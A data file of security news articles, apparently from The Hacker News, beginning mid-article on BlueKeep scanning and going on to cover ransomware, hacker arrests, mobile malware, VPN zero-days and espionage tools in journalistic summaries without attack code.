Graham used ""rdpscan,"" a quick scanning tool he built on top of his masscan port scanner that can scan the entire Internet for systems still vulnerable to the BlueKeep vulnerability, and found a whole 7 million systems that were listening on port 3389, of which around 1 million systems are still vulnerable.
""Hackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines,"" the researcher says.
""That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry, and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.""
The BlueKeep vulnerability has so much potential to wreak havoc worldwide that it forced Microsoft to release patches for not only the supported Windows versions but also Windows XP, Windows Vista and Windows Server 2003, which no longer receive mainstream support from the company but are still widely used.
Not just researchers, malicious hackers and cybercriminals have also started scanning the Internet for vulnerable Windows systems to target them with malware, GreyNoise Intelligence said.
""GreyNoise is observing sweeping tests for systems vulnerable to the RDP ""BlueKeep"" (CVE-2019-0708) vulnerability from several dozen hosts around the Internet. This activity has been observed from exclusively Tor exit nodes and is likely being executed by a single actor,"" the tweet says.
However, fortunately, so far no security researcher has yet publicly published any proof-of-concept exploit code for BlueKeep, though a few of them have confirmed to have successfully developed a working exploit.
Are you still waiting for me to tell you what you should do next? Go and fix the goddamn vulnerability if you are using one of them.
If fixing the flaw in your organisation is not possible anytime sooner, then you can take these mitigations:
Disable RDP services, if not required.
Block port 3389 using a firewall or make it accessible only over a private VPN.
Enable Network Level Authentication (NLA) – this is partial mitigation to prevent any unauthenticated attacker from exploiting this Wormable flaw.
Tor Browser 8.5.2 Released — Update to Fix Critical Firefox Vulnerability,https://thehackernews.com/2019/06/tor-browser-firefox-hack.html,"Important Update (21 June 2019) ➤ The Tor Project on Friday released second update (Tor Browser 8.5.3) for its privacy web-browser that patches the another Firefox zero-day vulnerability patched this week.
Following the latest critical update for Firefox, the Tor Project today released an updated version of its anonymity and privacy browser to patch the same Firefox vulnerability in its bundle.
Earlier this week, Mozilla released Firefox 67.0.3 and Firefox ESR 60.7.1 versions to patch a critical actively-exploited vulnerability (CVE-2019-11707) that could allow attackers to remotely take full control over systems running the vulnerable browser versions.
Besides updating Firefox, the latest Tor Browser 8.5.2 for desktops also includes updated NoScript version 10.6.3 that fixes a few known issues.
According to the Tor Project Team, if you are already using Tor browser with ""safer"" and ""safest"" security levels, the flaw doesn't affect you.
For some reason, the team hasn't yet released an updated Tor version for Android users, which should be available anytime soon in the next few days. However, Android users have been advised to switch on ""safer"" or ""safest"" security levels in order to mitigate the issue until a patched app becomes available.
""The security level on Android can be changed by going in the menu on the right of the URL bar and selecting Security Settings,"" Nicolas Vigier, the Lead Automation Engineer at Tor Project said.
The Google security researcher who discovered this flaw also revealed that it could be abused to launch universal cross-site scripting (UXSS) attacks as well, allowing malicious websites to bypass same-origin policy on the victim's web browser and steal sensitive information.
Since Tor is primarily being used by privacy-conscious users who can't afford to get compromised at any cost, it's highly recommended for them to install the latest version of the anonymity software immediately.
CryptoLocker Ransomware demands $300 or Two Bitcoins to decrypt your files,https://thehackernews.com/2013/10/cryptolocker-ransomware-demands-300-to.html,"If you're a daily computer user, you're likely aware of all the threats you face every day online in the form of viruses and malware.
CryptoLocker, a new ransomware malware, began making the rounds several months ago. This ransomware is particularly nasty because infected users are in danger of losing their personal files forever.
Ransomware is designed to extort money from computer users by holding computer files hostage until the computer user pays a ransom fee to get them back. The Cryptolocker hijacker sniffs out your personal files and wraps them with strong encryption before it demands money.
Cryptolocker is spread through malicious hyperlinks shared via social media and spam emails, like fake UPS tracking notification emails. The original demanded payments of $100 to decrypt files, but the new and improved version demanding $300 from victims.
Apparently, the encryption is created using a unique RSA-2048 public key. The decryption key is located on a secret server somewhere on the Internet and then there is a countdown on the infected machine which will let you know how long you have until this key will no longer be available.
Ransomware is not a new threat, but in the last year, it has become more effective and more popular with criminals. Researchers from a number of antivirus vendors are working on a way to undo the damage, but it's not going to be easy.
To prevent Ransomware from infecting your computer, please ensure that your computer has a properly configured firewall, updating each computer on a regular basis with the latest patches and updates from their vendor such as Microsoft, and restricting access solely to the administrator or person who operates the network or computer.
Update: Another Screenshot of the latest variant CryptoLocker illustrates that Ransomware accepts payment in Bitcoins also.
Once you send the payment of BTC2 (two Bitcoins, currently about $280), you will be shown a screen stating that your payment is being verified and the program will decrypt the files that it encrypted.
However, CryptoLocker is the first widely-reported instances where a ransomware program will actually go as far as permanently encrypting files on a host computer. Unfortunately at this time there is no way to retrieve the private key that can be used to decrypt your files.
This infection is typically spread through emails sent to company email addresses that pretend to be customer support related issues from Fedex, UPS, DHS, etc. These emails would contain a zip attachment that when opened would infect the computer. These zip files contain executable that are disguised as PDF files as they have a PDF icon and are typically named something like FORM_101513.exe or FORM_101513.pdf.exe. Since Microsoft does not show extensions by default, they look like normal PDF files and people open them.
If you do not have System Restore enabled on your computer or reliable backups, then you will need to pay the ransom in order to get your files back.
Russian Hacker Who Allegedly Hacked LinkedIn and Dropbox Extradited to US,https://thehackernews.com/2018/03/linkedin-hacker-extradited.html,"A Russian man accused of hacking LinkedIn, Dropbox, and Formspring in 2012 and possibly compromising personal details of over 100 million users, has pleaded not guilty in a U.S. federal court after being extradited from the Czech Republic.
Yevgeniy Aleksandrovich Nikulin, 30, of Moscow was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, but he was recently extradited to the United States from the Czech Republic on Thursday for his first appearance in federal court.
Nikulin's arrest started an extradition battle between the United States and Russia, where he faces significantly lesser criminal charges of stealing $3,450 via Webmoney in 2009. But the Czech Republic ruled in favor of the United States.
In the U.S., Nikulin is facing:
3 counts of computer intrusion
2 counts of intentional transmission of information, code, or command causing damage to a protected computer
2 counts of aggravated identity theft
1 count of trafficking in unauthorized access devices
1 count of conspiracy
According to the maximum penalties for each count, Nikulin faces a maximum of 32 years in prison and a massive fine of more than $1 Million.
The U.S. Justice Department accused Nikulin of allegedly hacking into computers belonging to three American social media firms, including LinkedIn, the online cloud storage platform Dropbox and now-defunct social-networking firm Formspring.
Nikulin reportedly gained access to LinkedIn's network between March 3 and March 4, 2012, Dropbox between May 14 and July 25, 2012, and Formspring between June 13 and June 29, 2012.
The hacker allegedly stole accounts of more than 117 Million LinkedIn users and more than 68 Million Dropbox users. Authorities also say that after stealing data from the three companies, Nikulin worked with unnamed co-conspirators to sell the stolen data.
Besides hacking into the three social media firms, the Justice Department also accused Nikulin of allegedly gaining access to credentials belonging to LinkedIn and Formspring employees, which helped him carry out the computer hacks.
Nikulin appeared in Federal District Court in San Francisco on Friday and pleaded not guilty to the charges against him, the New York times reported.
""This is deeply troubling behavior once again emanating from Russia,"" said Attorney General Jeff Sessions in a statement. ""We will not tolerate criminal cyber-attacks and will make it a priority to investigate and prosecute these crimes, regardless of the country where they originate.""
Judge Jacqueline Scott Corley scheduled Nikulin's next court appearance for status on April 2, 2018, and scheduled a detention hearing for April 4, 2018.
Suspected Wirelurker iOS Malware Creators Arrested in China,https://thehackernews.com/2014/11/suspected-wirelurker-ios-malware.html,"It's been almost two weeks since the WireLurker malware existence was revealed for the first time, and Chinese authorities have arrested three suspects who are allegedly the authors of the Mac- and iOS-based malware that may have infected as many as hundreds of thousands of Apple users.
The Beijing Bureau of Public security has announced the arrest of three suspects charged with distributing the WireLurker malware through a popular Chinese third-party online app store. The authorities also say the website that was responsible for spreading the malware has also been shut down.
""WireLurker"" malware was originally discovered earlier this month by security firm Palo Alto Networks targeting Apple users in China. The malware appeared as the first malicious software program that has ability to penetrate the iPhone's strict software controls. The main concern to worry about this threat was its ability to attack non-jailbroken iOS devices.
Once a device infected with the malware, the virus could download the malicious and unapproved apps, which are designed to steal information, from the third-party app stores and, if it detects an iOS device connected through the USB slot, it would install the malicious apps on the device as well.
""This malware is under active development and its creator's ultimate goal is not yet clear,"" the researchers wrote in a report [PDF]. ""The ultimate goal of the WireLurker attacks is not completely clear. The functionality and infrastructure allows the attacker to collect significant amounts of information from a large number of Chinese iOS and Mac OS systems, but none of the information points to a specific motive. We believe WireLurker has not yet revealed its full functionality.""
Unlike most iPhone bug, WireLurker malware has ability to install even on non-jailbroken iOS devices because the malware authors have used enterprise certificates to sign the apps. Apple has since revoked these cryptographic certificates used to sign WireLurker, and blocked all the apps signed with it. Palo Alto estimated that hundreds of thousands of users installed the malicious apps.
China appears to have taken the threat very seriously and within two weeks arrested three individuals who are believed to be the creators of the malicious software.
Although, there is not much details available about the arrest as the Bureau has simply posted a short notification on its Sina Weibo, a Chinese micro blogging service.
But according to the Chinese authorities, the three suspects are identified as ""Chen,"" ""Lee"" and ""Wang,"" who are suspected of manufacturing and distributing the malicious program ""for illegal profit,"" and that the Chinese authorities have been helped in the investigation by researchers from Chinese AV company Qihoo 360.
Half Million Chinese Android Devices got infected with SMSZombie,https://thehackernews.com/2012/08/half-million-chinese-android-devices.html,"The amount of malware crafted and aimed at Android devices is ever-increasing. With Android being the most popular platform for smartphones and tablets around the world, Android users have become the low-hanging fruit when it comes to writing malware by the nefarious users. A new Android threat has affected 500,000 devices in China so far.
Analysts at TrustGo Security Labs have discovered the Trojan!SMSZombie.A. It is a complex and sophisticated malware that exploits a vulnerability in the China Mobile SMS Payment System to fund unauthorised payments, steal bank card numbers and receipt information regarding money transfers. The trojan is difficult to detect, and even more difficult to remove.
SMSZombieA was first discovered on August 8, and the malware is embedded in several wallpaper apps. The wallpaper apps are noted to use provocative titles and nude images to encourage users to download. The trojan installs itself on a device after its user has downloaded and installed the app, making detection difficult. As a result, the wallpaper app is not flagged as malicious in the marketplace.
Further, the trojan can change the amount and timing of unauthorised charges; that way most times users don't know that they have been hacked. According to the information TrustGo Vice President of Engineering , the Trojan does not report back to a C&C server. In fact, the malware receives its orders from an ever-changing set of random phone numbers.
The malware can remotely control the infected device. It enables hackers to remotely control victims' mobile SMS payments system, allowing them to secretly authorize payments for amount and at any time. ""Our guess is that these malware developers have some connection with these premium services,"".
Researchers have found that by using a configuration file, which can be updated by the makers of the malware at any time, it is possible for the malware to intercept and forward text messages. As SMSes sometimes include banking information and other financial details, the malware can wreak further havoc in user accounts.
"Samsung LoopPay Hacked, but 'Samsung Pay' is Safe",https://thehackernews.com/2015/10/Samsung-LoopPay-hack.html,"Samsung has been surrounded by a lot of controversies since the past few years, but that has not influenced its productivity.
But this report has raised a few eyebrows...
Samsung's mobile payment system company, LoopPay, was hacked back in March this year, just a month after Samsung bought it to help make Samsung Pay a reality.
Samsung acquired LoopPay for more than $250 Million in February this year, and a group of Chinese Hackers were able to access LoopPay computer systems in March.
The most worrisome part is – the hack was discovered 5 months later in August.
Hackers were After Technology; Not Money or Sensitive Data
The hackers, believed to be from a group called 'Codoso Group' or 'Sunshock Group,' were after the company's Magnetic Secure Transmission (MST) Technology.
The group injected LoopPay's computer network with a hidden sophisticated attack in March, but the investigation kicked off when LoopPay learned of the breach in late August.
During the investigation the two private forensics teams appointed by LoopPay discovered several facts about the Codoso Group which revealed:
The hackers broke into LoopPay's corporate network, but not the production system that helps manage payments.
It seems the hackers were after the MST technology, which is the key part of the Samsung Pay mobile payment system that made its public debut in the US last week.
So, there is less possibility of leaking user credentials online.
Samsung Pay and the MST Technology
Samsung Pay is a similar method of mobile payment which is earlier adopted by Apple (Apple Pay) and Google (Android Wallet), allowing consumers to pay for products using their smartphones with Near-Field Communications (NFC) technology.
While most tap-and-pay mobile wallets need a point-of-sale system with NFC capabilities, LoopPay's MST technology gives an advantage to Samsung Pay by:
Supporting older payment systems by emulating a commonly used magnetic stripe card.
With its reach on limited Samsung smartphones, MST works with 90% of legacy terminals in use by the United States retailers.
LoopPay Hacked! But Samsung Pay Not Affected
Samsung said that Samsung Pay was not affected by the LoopPay hack and that no user data was compromised.
In a statement, Samsung's chief privacy officer Darlene Cedres said, ""Samsung Pay was not impacted and at no point was any personal payment information at risk. This was an isolated incident that targeted the LoopPay corporate network, which is a physically separate network from Samsung Pay.""
Adding more to it, Will Graylin, LoopPay's chief executive and co-general manager of Samsung Pay told that they have not filed a lawsuit at present, but…
...if the Codoso Group would ever misuse the information against Samsung Pay or make a Copycat product, LoopPay could file a patent lawsuit.
Codoso Group creates Havoc when they arrive!
LoopPay is not their first victim; previously the Chinese Government-affiliated hacking group has launched attacks on Forbes.com in February and conquered security of many other entities.
In other cases, investigators and security experts have established the Modus Operandi of the Codoso Group, which reveal that the group plans their attack with an everlasting effect, as in they are famous for...
Planting hidden backdoors across victims' systems so that they continue to spread their virus long after the initial breach.
It is like the Codoso group spreads the infection across the systems and secure and separate their hideout.
However, the investigation is still going in this case. Further, the experts say that it takes a longer period to recover from such attacks.
Bitcoins - Secured by NSA designed Encryption or Backdoored ?,https://thehackernews.com/2013/09/NSA-backdoor-bitcoin-encryption-sha256-snowden.html,"It's been nearly three months since Edward Snowden started telling the world about the National Security Agency's mass surveillance of global communications.
After the last week report that the National Security Agency has leveraged its cooperative relationships with specific industry partners to insert vulnerabilities into Internet security products.
Bitcoin, a virtual currency, a peer-to-peer electronic cash system, which is generated on a logarithmic scale by dedicated miners who run software that generate the complex hash codes which make up a Bitcoin.
The integrity of Bitcoin depends on a hash function called SHA-256, which was designed by the NSA and published by the National Institute for Standards and Technology (NIST).
Is it hard to believe that could the intelligence community have a secret exploit for Bitcoin? While there is no evidence yet to support the speculation.
""If you assume that the NSA did something to SHA-256, which no outside researcher has detected, what you get is the ability, with credible and detectable action, they would be able to forge transactions. The really scary thing is somebody finds a way to find collisions in SHA-256 really fast without brute-forcing it or using lots of hardware and then they take control of the network."" Cryptography researcher Matthew D. Green of Johns Hopkins University said.
Bitcoin has recently added in the watchlist of the New York Department of Financial Services, the California Department of Financial Institutions and U.S Government is asking all intelligence agencies for information on how it plans to deal with Bitcoin.
The NSA apparently possesses groundbreaking capabilities against encrypted voice and text communication and has invested billions of dollars since 2000 to make nearly everyone's secrets available for government consumption by cracking every encryption. But we don't know precisely how much, maybe including Bitcoin too?
Last month, we reported an Android security vulnerability which resulted in the theft of coins, because of Weak random number generators (RNGs) was implicated in Bitcoin. Is it possible that this vulnerability was known to be weak by the NSA, and that bitcoin thieves simply stumbled upon the security hole first?
""Bitcoin was the last thing on which I trusted blindly over the internet and If someday another Snowden will reveal that this really happens, I would just switch off my life from the Digital World."", Aman Srivastava, Bitcoin user of the Silk Road and other underground marketplaces.
Even today it's too early to come to conclusions about Bitcoin. Possibly it was designed from day one as a tool to help maintain control of the money supplies of the world.
Further, cryptographers at John Hopkins University are creating a another anonymous system called Zerocoin that would be a Inception like an alternative currency to the Bitcoin.
90000 web pages infected by mass iFrame attack,https://thehackernews.com/2011/07/90000-web-pages-infected-by-mass-iframe.html,"90000 web pages infected by mass iFrame attack
Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered that more than 90000 web pages are infected by mass iFrame attack. There's been a mass scale injection ongoing recently, with the injected iframe pointing to willysy.com .
Just Try a simple Google Search to find out the facts.
Video Demonstration:
Researchers at Armorize said the injected scripts redirect users to malicious Web domains that is launching attacks targeting known vulnerabilities in Java, Adobe's PDF, Microsoft's Internet Explorer and other common platforms, according to the report by Armorize experts Wayne Huang, Chris Hsiao and NightCola Lin. The campaign is targeting online commerce sites, the researchers found.
Read more at Source.
Data Stealing Malware on Internal Computer of Japan Space Agency,https://thehackernews.com/2012/01/data-stealing-malware-on-internal.html,"Data Stealing Malware on Internal Computer of Japan Space Agency
Japan Aerospace Exploration Agency (JAXA) announce that their computer has been infected with a virus, leading to a possible leak of data on its H-II Transfer Vehicle (HTV) the craft popularly known as Konotori that hauls cargo for the International Space Station (ISS). JAXA still isn't sure how the virus got on the computer, or who put it there.
JAXA said the infection occurred on July 6 last year, when an employee in his 30s involved in the HTV's operation at the Tsukuba Space Center opened an e-mail attachment titled ""bonenkai"". An identical e-mail was also sent to several coworkers, but the employee accidentally opened the attachment as the sender had the same name as one of his friends. The space agency is working to minimize the damage and prevent further incursions.
JAXA is now conducting an investigation into the leak and is checking other computers for viruses, according to the press release. The agency said it would provide further details about the leaked information at an unspecified date.
WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations,https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html,"If Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.
At least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.
""A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, CVE-2021-22893, are responsible for the initial infection vector,"" cybersecurity firm FireEye said on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.
The company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (""UNC"" for Uncategorized) — the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 — with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor APT5 based on ""strong similarities to historic intrusions dating back to 2014 and 2015.""
Attacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.
The list of malware families is as follows -
Two additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.
By exploiting multiple Pulse Secure VPN weaknesses (CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.
Ivanti, the company behind the Pulse Secure VPN, has released temporary mitigations to address the arbitrary file execution vulnerability (CVE-2021-22893, CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a ""very limited number of customers,"" adding it has released a Pulse Connect Secure Integrity Tool for customers to check for signs of compromise.
Pulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.
News of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government released an advisory, warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.
Spam Tweets 'US Government Trying to Shut Down Bitcoin' Spreading Malware,https://thehackernews.com/2014/05/spam-tweets-us-government-trying-to.html,"The Security Software company Malwarebytes has discovered a malicious scam spreading through rogue tweets by a number of fake Twitter accounts with a link to a story that says the United States Government is trying to ban cryptocurrency Bitcoin.
""The majority of the accounts pushing these things are clearly fake, using gathered Twitter handles to launch the barrage of malicious spam at the Twitterverse,"" wrote Adam Kujawa of Malwarebytes in a blog post on Thursday.
In most cases, cybercriminals use to spread the malicious software via an email, but distribution of malware through social media is relatively new tantrum of cyber criminals, as more people are fond of social media platforms now a days.
Adam discovered the scam and according to him the worst part of this new Twitter scam is that even without realizing the impact of this fake news, other Twitter users are retweeting from their accounts, making the malware scam more worse.
The tweets contain links lead to a news video on the Wall Street Journal and once you click on the link to watch the news video, you'll be first asked to install Adobe Flash Player.
As soon as you click on the ""Install"" icon, it will actually start downloading a piece of malware and this malware then further could be used by the spammers to download even more sophisticated malware onto your system.
The researcher analyzed the malware and found it to be a remote access Trojan (RAT), which is possibly related to the Darkcomet RAT.
""According to my own dynamic analysis, the malware creates an establish connection with a remote server and drops additional malware, such as the ""notepad.exe"" that is found in the Temp folder and beaconing out to the same remote server as the initial Install file,"" said Adam.
The URL of the link is actually sticking to the domain ""www.siam-sunrise.com"" which belongs to a website for a business in Thailand. Aside from the URL, the phishing site looks quite legitimate to the Wall Street Journal website with WSJ logo to trick the visitors.
Twitter has already shut down numerous accounts related to the spam and users are highly recommended to have a good anti-virus solution on their systems and avoid clicking any suspicious link and if found, immediately report the suspicious tweets to Twitter as Spam.
WhatsApp for Windows? Naaa.. Hackers are spamming Malware as WhatsApp Software,https://thehackernews.com/2014/01/whatsapp-for-windows-naaa-hackers-are.html,"Cyber criminals are taking advantage of the widespread popularity of the mobile messaging app 'WhatsApp'. A malware expert at the Kaspersky Lab revealed a large-scale spamming campaign, advertising a fake PC version of the WhatsApp, to spread a banking trojan.
According to the report, unaware users have received an email written in Portuguese language, it also tries to deceive the recipient with a social engineering tactic in which cyber criminals composed the malicious email informing that victims already have 11 pending friend invitations.
If users click on the ""Baixar Agora"" (Download Now) link in the spam email, they will be redirected to a Hightail.com URL to download the Trojan. Hightail is a cloud storage service, the malicious component deployed on it then downloads the malware via a server in Brazil.
The file stored on Hightail server looks like a 64-bit installation file bundled with 2.5 megabyte MP3 file. According to Virus Total engine, only 3 out of 49 anti-malware softwares are able to detect it.
""This Downloader has some anti-debugging features like: UnhandledExceptionFilter() and RaiseException() and once running, it downloads a new Trojan that is banker itself. This time the malware comes from a server in Brazil and has a low VT detection 3 of 49. The recently downloaded banker has the icon of an mp3 file. Most users would click on it, especially after seeing it is about 2.5MB in its weight.""
During execution of the malicious code, it communicates with the command & control servers to provide infection statistics and system console through the local port 1157. The Malware sends back the stolen information in the Oracle DB format. The malicious code is also able to download another payload on the infected system.
There are some interesting consideration to do:
The technique used by the attacker could result very effective in areas where the application is mostly used i.e. Latin America and Europe. The WhatsApp has more than 430 million users and 30 million added in just the last month.
Researchers identified a ""classic style of a Brazilian-created malware"" pattern, the malicious agent targeted Brazilian population much inclined to the use of WhatsApp. The language used and the fact that the Trojan is downloaded from a Brazilian server confirm the hypothesis.
This isn't the first spam email campaign that abused the WhatsApp brand, cyber criminals leveraged the service in the past November to push malware via email by tricking users into thinking they had a new voicemail message.
This week Symantec antivirus firm also identified a Windows Malware that can hack your Android Mobile. Please Pay attention to the url you click! Stay Secure.
LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials,https://thehackernews.com/2018/01/leakedsource-operator-charged.html,"Canadian authorities have arrested and charged an Ontario man for operating a website that collected 'stolen' personal identity records and credentials from some three billion online accounts and sold them for profit.
According to the Royal Canadian Mounted Police (RCMP), the 27-year-old Jordan Evan Bloom of Thornhill is the person behind the notorious LeakedSource.com—a major repository that compiled public data breaches and sold access to the data, including plaintext passwords.
Launched in late 2015, LeakedSource had collected around 3 billion personal identity records and associated passwords from some of the massive data breaches, including LinkedIn, VK.com, Last.Fm, Ashley Madison, MySpace, Twitter, Weebly and Foursquare, and made them accessible and searchable to anyone for a fee.
LeakedSource was shut down, and its associated social media accounts have been suspended after the law enforcement raided its operator earlier last year.
However, another website with the same domain name hosted by servers in Russia is still in operation.
Bloom is accused of operating the notorious website and claimed to have earned nearly US$200,000 by selling stolen personal identity records and associated passwords for a ""small fee"" via his site.
Appeared in a Toronto court on Monday, January 15, Bloom charged with trafficking in identity information, mischief to data, unauthorised use of a computer, and possession of property obtained by crime, the RCMP said.
""This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,"" the RCMP Cybercrime Investigative Team said in a statement.
""The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.""
Bloom was arrested and charged on December 22, 2017, as part of the RCMP's national cybercrime division investigation, dubbed 'Project Adoration.'
The RCMP said the Dutch national police and the United States' FBI assisted in the operation, adding the case could not have been cracked without international collaboration.
Bloom is currently in custody and due back in court on February 16.
Cybersecurity lawyer Imran Ahmad told Reuters that Bloom could face a maximum sentence 10 years in prison.
New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers,https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html,"A Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday.
The APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos.
""One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data,"" Kaspersky said. ""This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.""
First observed by CrowdStrike in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT.
Exfiltrating Data to Removable Drives
Kaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore — namely a keylogger and an RDP logger that captures details about users connected to a system via RDP.
""Each cluster of activity had a different geographical focus,"" the researchers said. ""The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.""
Both BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems.
Chief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive.
What's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine.
A telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year.
The initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called DLL search order hijacking before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device.
""The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,"" the researchers said. ""This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.""
Ultimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity.
""Cycldek is an example of an actor that has broader capability than publicly perceived,"" Kaspersky concluded. ""While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.""
Embassy of Kazakhstan hacked by Anonymous Supporters,https://thehackernews.com/2012/01/embassy-of-kazakhstan-hacked-by.html,"Embassy of Kazakhstan hacked by Anonymous Supporters
The official website of Embassy of Kazakhstan in Delhi having SQL injection Vulnerability, and Hacker with codename - Abs0luti0n has successfully Extract the database tables info and leak it on a pastebin note including Admin's Username and Password.
Hacker said,""Lately we have been experimenting on some new large targets which will be unveiled soon. However today while we were cruising around in our lulzmobile,we set sights momentarily on another outdated weak vehicle and with great ease put the pedal to the metal, ran all the lights and flew straight through our accquired target.""
SQL Injection is a type of web application security vulnerability in which an attacker is able to submit a database SQL command which is executed by a web application, exposing the back-end database. Attackers utilize this vulnerability by providing specially crafted input data to the SQL interpreter in such a manner that the interpreter is not able to distinguish between the intended commands and the attacker's specially crafted data. The interpreter is tricked into executing unintended commands.
SQL injection can be prevented if you adopt an input validation technique in which user input is authenticated against a set of defined rules for length, type, and syntax and also against business rules.
"Gameover Malware, variant of ZeuS Trojan uses Encryption to Bypass Detection",https://thehackernews.com/2014/02/gameover-malware-variant-of-zeus-trojan.html,"The year begins with the number of new variants of malware that were discovered by various security researchers. The new variants are more complex, sophisticated and mostly undetectable.
Two years back in 2012, the FBI warned us about the 'GameOver' banking Trojan, a variant of Zeus financial malware that spreads via phishing emails. GameOver makes fraudulent transactions from your bank once installed in your system with the capability to conduct Distributed Denial of Service, or DDoS, attack using a botnet, which involves multiple computers flooding the financial institution's server with traffic in an effort to deny legitimate users access to the site.
But that wasn't the end; a new variant of the same family of banking Trojan has been discovered by researchers that are being delivered by cyber criminals to users' machines, making it easier for the banking malware to evade detection and steal victim's banking credentials.
Malcovery's Gary Warner explains the behavior of the new variant of GameOver Zeus malware that uses Encryption to bypass perimeter security, in a blog post.
Gary Warner warned that, to get this job done the malware has been working along with other malware called 'UPATRE' via Social Engineering techniques.
New version of GameOver malware has encrypted its '.EXE' file to a non-executable format i.e. '.ENC' file, so that the malware which spreads via spam e-mails and malicious attachments can avoid being spotted by firewalls, IDS, Web filters and other security defenses.
To Spread it at large scale, spam campaign using 'Cutwail' botnet, which is designed to look like an official correspondence from banks or some government agencies that trick user to open the attached .zip file.
Gary Warner explains that, ""These .zip files contain a small .exe file whose primary job is to go out to the Internet and download larger, more sophisticated malware that would never pass through spam filters without causing alarm, but because of the way our perimeter security works, are often allowed to be downloaded by a logged in user from their workstation.""
Boldizsár Bencsáth, from the CrySys Lab in Hungary, has explained the encryption method in his blog post on Sunday, ""The droppers sent out through emails are pretty small, around 10-18 KB. These droppers have an obfuscation layer, so hard to directly analyze them.""
In the new model, the .zip file attached to the email has a new version of UPATRE malware that first downloads the .ENC file from the Internet, then Decrypt it and relocate it with a new file name, then causing it both to execute and to be scheduled to execute in the future, Warner writes.
Keep your anti virus up to date.
Website Backdoor Scripts Leverage the Pastebin Service,https://thehackernews.com/2015/01/pastebin-wordpress-website-hacking.html,"The popular copy and paste website 'Pastebin' created a decade ago for software developers and even by hackers groups to share source code, dumps and stolen data, has more recently been leveraged by cyber criminals to target millions of users.
Compromising a website and then hosting malware on it has become an old tactic for hackers, and now they are trying their hands in compromising vast majority of users in a single stroke. Researchers have discovered that hackers are now using Pastebin to spread malicious backdoor code.
According to a blog post published yesterday by a senior malware researcher at Sucuri, Denis Sinegubko, the hackers are leveraging the weakness in older versions of the RevSlider, a popular and a premium WordPress plugin. The plugin comes packaged and bundled into the websites' themes in such a way that many website owners don't even know they have it.
